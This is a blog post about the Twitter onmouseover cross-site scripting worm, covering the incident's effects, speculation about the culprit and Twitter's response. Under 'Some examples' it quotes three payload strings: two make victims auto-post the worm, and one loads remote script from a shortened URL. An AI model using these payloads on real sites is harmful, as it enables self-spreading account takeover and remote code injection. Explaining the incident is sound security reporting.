Twitter onmouseover attack

This post is also available in: Slovenian




Twitter gone mad this Tuesday or as she wrote @sparkica twitter is speaking Klingon language. All this was possible by security hole on the website twitter.com.

Twitter accounts massively receiving strange text messages and if you go with your mouse over tweet it automatically opens a particular page (spam content, but it could be a page with malicious code, fortunately this did not happen). In most cases tweets were also automatically sent to followers and in the worst case users have been locked out from their accounts. Because of that security hole users not have been infecting their computers and no data was theft.

Some examples

http://a.no/@”onmouseover=”;$(‘textarea:first’).val(this.innerHTML);$(‘.status-update-form’).submit()” style=”color:#123;background:#827;/

http://a.no/@”onmouseover=”;$(‘textarea:first’).val(this.innerHTML);$(‘.status-update-form’).submit()” style=”color:#768;background:#054;/

t.co/@”style=”font-size:999999999999px;”onmouseover=”$.getScript(‘http:u002fu002fis.gdu002ffl9A7′)”

Using other apps to access twitter account

Luckily for me, I’m using Digsby app for managing my twitter accounts and I rarely go to the twitter.com, so I was not affected by this error, I just got a few weird messages from others. The same was for all those users who use third part twitter applications, accessing via mobile site m.twitter.com or through the new Twitter, since the problem only appears on the main twitter site.

 Interesting; 78 % unique users access their accounts through twitter.com, although there are many apps that I believe are even more effective way of using Twitter.

XSS attack

Cross-site scripting (XSS) . Exploiting the opportunities of javascript command to be inserted into form on the website, through messages on IM, email, forums, search engine results…

In this case it was used onmouseover javascript command – an action that is followed when you go over tweet with your mouse – and automatically opens another web page and automatically retweets to your followers.

Who’s the real culprit?

On the internet and news media has spread the news that the original tweet came from user @zzap. It’s an Australian teenager Pearce Deplin, 17 years old boy from Melbourne, who wrote on twitter profile that it is almost legal, social media whore and politics lover. After the disclosure he said: »I had no idea it was going to take off.”

But according to Sophos he just took credit for this and has from then experienced his 5 minutes of fame. I join Sophos’ opinion, because Twitter would probably immediately close the account, if he really did it. Looking a little back in Delphin’s tweet history you can see, he’s’ asking about @matsta xss attack.

Since twitter account @matsta is suspended, we can conclude that that this is real culprit.

Attack alerts

Only day before twitter onmouseover error I wrote in the article Are hackers attacked your site? how some web site handle hackers attack on their webpage in alerting public.

Twitter immediately inform users about the error many times on their multiple pages (@safety , @spam , statust.twitter.com , blog.twitter.com) and solved the problem in few hours ( after upgrade they mistakenly left open entering code in the URL link in tweets). At the same time twitter community informs and alerts themselves. Finally Twitter has explained in more details on his xss attack in blog, so there remains no ambiguity.

Saša

Works as system engineer in Slovenian Enterprise in Microsoft environment focusing on security, deployments, SharePoint, SCCM and CheckPoint firewall. Author of successful blog about IT security, Microsoft tips & tricks, social media, internet trends.

Leave a Reply